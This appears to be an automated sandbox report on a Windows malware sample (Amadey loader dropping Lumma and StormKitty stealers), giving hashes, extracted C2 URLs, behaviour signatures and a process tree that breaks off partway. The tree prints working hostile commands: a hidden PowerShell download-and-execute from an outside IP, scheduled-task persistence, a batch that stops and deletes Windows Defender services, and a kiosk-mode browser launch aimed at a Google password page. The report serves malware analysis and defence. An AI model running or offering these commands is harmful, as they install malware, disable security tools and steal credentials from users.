Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/04/2025, 14:53

General

  • Target

    2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    bb21f9fbe55dd586fd6433258aa91fe9

  • SHA1

    88e463bbed4d3c0eb22c97d83a30614a8d79dd84

  • SHA256

    66caf27768a2d6e9992f20b76cfcdf3e5a5863b951632fb6359c6fac733a1654

  • SHA512

    b26a732ac31b93a354bffe0dc04051c87e830843168f5b2a2f3ca9d9a07672ae06363f8a0b62ae6f483c82bad557e11b72ce1616f7842ea5dcddea3c40b43b63

  • SSDEEP

    24576:iqDEvCTbMWu7rQYlBQcBiT6rprG8a0Mu:iTvC/MTQYxsWR7a0M

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://iqironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://madvennture.top/GKsiio

https://targett.top/dsANGt

https://qspacedbv.world/EKdlsk

https://igalxnetb.today/GsuIAo

https://hcosmosyf.top/GOsznj

https://ironloxp.live/aksdd

https://hywnnavstarx.shop/FoaJSi

https://advennture.top/GKsiio

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://hadvennture.top/GKsiio

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 18 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 26 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 40 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 22 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 26 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2632
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:6516
    • C:\Users\Admin\AppData\Local\Temp\2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:3304
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn 2iNNYmagjba /tr "mshta C:\Users\Admin\AppData\Local\Temp\38eVJjXmk.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4028
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn 2iNNYmagjba /tr "mshta C:\Users\Admin\AppData\Local\Temp\38eVJjXmk.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:1332
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\38eVJjXmk.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4136
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'KEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:656
          • C:\Users\Admin\AppData\Local\TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE
            "C:\Users\Admin\AppData\Local\TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:4304
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1744
              • C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe
                "C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1840
                • C:\Users\Admin\AppData\Local\Temp\261.exe
                  "C:\Users\Admin\AppData\Local\Temp\261.exe"
                  7⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1708
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C6EA.tmp\C6EB.tmp\C6EC.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1704
                    • C:\Users\Admin\AppData\Local\Temp\261.exe
                      "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                      9⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:2220
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C861.tmp\C862.tmp\C863.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                        10⤵
                        • Drops file in Program Files directory
                        • Suspicious use of WriteProcessMemory
                        PID:4936
                        • C:\Windows\system32\sc.exe
                          sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                          11⤵
                          • Launches sc.exe
                          PID:3016
                        • C:\Windows\system32\sc.exe
                          sc start ddrver
                          11⤵
                          • Launches sc.exe
                          PID:3560
                        • C:\Windows\system32\timeout.exe
                          timeout /t 1
                          11⤵
                          • Delays execution with timeout.exe
                          PID:452
                        • C:\Windows\system32\sc.exe
                          sc stop ddrver
                          11⤵
                          • Launches sc.exe
                          PID:4064
                        • C:\Windows\system32\sc.exe
                          sc start ddrver
                          11⤵
                          • Launches sc.exe
                          PID:736
                        • C:\Windows\system32\takeown.exe
                          takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                          11⤵
                          • Possible privilege escalation attempt
                          • Modifies file permissions
                          PID:396
                        • C:\Windows\system32\icacls.exe
                          icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                          11⤵
                          • Possible privilege escalation attempt
                          • Modifies file permissions
                          PID:112
                        • C:\Windows\system32\sc.exe
                          sc stop "WinDefend"
                          11⤵
                          • Launches sc.exe
                          PID:3704
                        • C:\Windows\system32\sc.exe
                          sc delete "WinDefend"
                          11⤵
                          • Launches sc.exe
                          PID:4048
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                          11⤵
                            PID:4856
                          • C:\Windows\system32\sc.exe
                            sc stop "MDCoreSvc"
                            11⤵
                            • Launches sc.exe
                            PID:3668
                          • C:\Windows\system32\sc.exe
                            sc delete "MDCoreSvc"
                            11⤵
                            • Launches sc.exe
                            PID:4652
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                            11⤵
                              PID:1300
                            • C:\Windows\system32\sc.exe
                              sc stop "WdNisSvc"
                              11⤵
                              • Launches sc.exe
                              PID:5048
                            • C:\Windows\system32\sc.exe
                              sc delete "WdNisSvc"
                              11⤵
                              • Launches sc.exe
                              PID:2340
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                              11⤵
                                PID:1064
                              • C:\Windows\system32\sc.exe
                                sc stop "Sense"
                                11⤵
                                • Launches sc.exe
                                PID:1184
                              • C:\Windows\system32\sc.exe
                                sc delete "Sense"
                                11⤵
                                • Launches sc.exe
                                PID:1816
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                11⤵
                                  PID:3676
                                • C:\Windows\system32\sc.exe
                                  sc stop "wscsvc"
                                  11⤵
                                  • Launches sc.exe
                                  PID:3284
                                • C:\Windows\system32\sc.exe
                                  sc delete "wscsvc"
                                  11⤵
                                  • Launches sc.exe
                                  PID:4024
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                  11⤵
                                  • Modifies security service
                                  PID:2740
                                • C:\Windows\system32\sc.exe
                                  sc stop "SgrmBroker"
                                  11⤵
                                  • Launches sc.exe
                                  PID:1340
                                • C:\Windows\system32\sc.exe
                                  sc delete "SgrmBroker"
                                  11⤵
                                  • Launches sc.exe
                                  PID:4172
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                  11⤵
                                    PID:1520
                                  • C:\Windows\system32\sc.exe
                                    sc stop "SecurityHealthService"
                                    11⤵
                                    • Launches sc.exe
                                    PID:656
                                  • C:\Windows\system32\sc.exe
                                    sc delete "SecurityHealthService"
                                    11⤵
                                    • Launches sc.exe
                                    PID:3216
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                    11⤵
                                      PID:2408
                                    • C:\Windows\system32\sc.exe
                                      sc stop "webthreatdefsvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:1556
                                    • C:\Windows\system32\sc.exe
                                      sc delete "webthreatdefsvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:3656
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                      11⤵
                                        PID:4812
                                      • C:\Windows\system32\sc.exe
                                        sc stop "webthreatdefusersvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:4176
                                      • C:\Windows\system32\sc.exe
                                        sc delete "webthreatdefusersvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:3096
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                        11⤵
                                          PID:4052
                                        • C:\Windows\system32\sc.exe
                                          sc stop "WdNisDrv"
                                          11⤵
                                          • Launches sc.exe
                                          PID:2484
                                        • C:\Windows\system32\sc.exe
                                          sc delete "WdNisDrv"
                                          11⤵
                                          • Launches sc.exe
                                          PID:2520
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                          11⤵
                                            PID:4156
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdBoot"
                                            11⤵
                                            • Launches sc.exe
                                            PID:2756
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdBoot"
                                            11⤵
                                            • Launches sc.exe
                                            PID:3128
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                            11⤵
                                              PID:2444
                                            • C:\Windows\system32\sc.exe
                                              sc stop "WdFilter"
                                              11⤵
                                              • Launches sc.exe
                                              PID:848
                                            • C:\Windows\system32\sc.exe
                                              sc delete "WdFilter"
                                              11⤵
                                              • Launches sc.exe
                                              PID:1248
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                              11⤵
                                                PID:5088
                                              • C:\Windows\system32\sc.exe
                                                sc stop "SgrmAgent"
                                                11⤵
                                                • Launches sc.exe
                                                PID:2368
                                              • C:\Windows\system32\sc.exe
                                                sc delete "SgrmAgent"
                                                11⤵
                                                • Launches sc.exe
                                                PID:3696
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                11⤵
                                                  PID:4124
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "MsSecWfp"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:4236
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "MsSecWfp"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:5076
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                  11⤵
                                                    PID:1044
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "MsSecFlt"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:4504
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "MsSecFlt"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:2360
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                    11⤵
                                                      PID:3584
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "MsSecCore"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:740
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "MsSecCore"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:1624
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                      11⤵
                                                        PID:3524
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                        11⤵
                                                          PID:2848
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                          11⤵
                                                            PID:2600
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                            11⤵
                                                              PID:4796
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                              11⤵
                                                                PID:3052
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop ddrver
                                                                11⤵
                                                                • Launches sc.exe
                                                                PID:4572
                                                              • C:\Windows\system32\sc.exe
                                                                sc delete ddrver
                                                                11⤵
                                                                • Launches sc.exe
                                                                PID:1876
                                                    • C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:704
                                                    • C:\Users\Admin\AppData\Local\Temp\10417510101\KXtPusH.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10417510101\KXtPusH.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Accesses Microsoft Outlook profiles
                                                      • System Location Discovery: System Language Discovery
                                                      • Checks processor information in registry
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • outlook_office_path
                                                      • outlook_win_path
                                                      PID:3848
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                                        PID:3052
                                                        • C:\Windows\SysWOW64\chcp.com
                                                          chcp 65001
                                                          8⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3432
                                                        • C:\Windows\SysWOW64\netsh.exe
                                                          netsh wlan show profile
                                                          8⤵
                                                          • Event Triggered Execution: Netsh Helper DLL
                                                          • System Location Discovery: System Language Discovery
                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                          PID:2220
                                                        • C:\Windows\SysWOW64\findstr.exe
                                                          findstr All
                                                          8⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3528
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 2464
                                                        7⤵
                                                        • Program crash
                                                        PID:1936
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2148
                                                        • C:\Windows\SysWOW64\chcp.com
                                                          chcp 65001
                                                          8⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5048
                                                        • C:\Windows\SysWOW64\netsh.exe
                                                          netsh wlan show networks mode=bssid
                                                          8⤵
                                                          • Event Triggered Execution: Netsh Helper DLL
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2872
                                                    • C:\Users\Admin\AppData\Local\Temp\10419530101\0d58f17e45.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10419530101\0d58f17e45.exe"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious use of SetThreadContext
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1520
                                                      • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10419530101\0d58f17e45.exe"
                                                        7⤵
                                                        • Downloads MZ/PE file
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:3656
                                                    • C:\Users\Admin\AppData\Local\Temp\10419540101\5a6472d2dc.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10419540101\5a6472d2dc.exe"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious use of SetThreadContext
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1800
                                                      • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10419540101\5a6472d2dc.exe"
                                                        7⤵
                                                        • Downloads MZ/PE file
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5048
                                                    • C:\Users\Admin\AppData\Local\Temp\10419550101\632e73f709.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10419550101\632e73f709.exe"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:976
                                                    • C:\Users\Admin\AppData\Local\Temp\10419560101\a399701ee4.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10419560101\a399701ee4.exe"
                                                      6⤵
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Checks processor information in registry
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:4000
                                                    • C:\Users\Admin\AppData\Local\Temp\10419570101\9bdc94caf0.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10419570101\9bdc94caf0.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SendNotifyMessage
                                                      PID:3432
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /F /IM firefox.exe /T
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:632
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /F /IM chrome.exe /T
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3232
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /F /IM msedge.exe /T
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:464
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /F /IM opera.exe /T
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3012
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /F /IM brave.exe /T
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5020
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                        7⤵
                                                          PID:3084
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                            8⤵
                                                            • Checks processor information in registry
                                                            • Modifies registry class
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of FindShellTrayWindow
                                                            • Suspicious use of SendNotifyMessage
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4752
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1988 -prefsLen 27099 -prefMapHandle 1992 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {bf12cc01-b639-4154-b60b-525ae7d43488} -parentPid 4752 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4752" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                              9⤵
                                                                PID:1624
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2460 -prefsLen 27135 -prefMapHandle 2464 -prefMapSize 270279 -ipcHandle 2472 -initialChannelId {416016ac-927a-45fa-a381-b253b45fb973} -parentPid 4752 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4752" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                9⤵
                                                                  PID:3532
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3780 -prefsLen 25164 -prefMapHandle 3784 -prefMapSize 270279 -jsInitHandle 3788 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3796 -initialChannelId {2e6485db-2f70-4330-8aaf-988ede76cf71} -parentPid 4752 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4752" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:4316
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3984 -prefsLen 27276 -prefMapHandle 3988 -prefMapSize 270279 -ipcHandle 4080 -initialChannelId {28cf90d7-9f61-439b-8c10-49193dbdacca} -parentPid 4752 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4752" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                  9⤵
                                                                    PID:2600
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
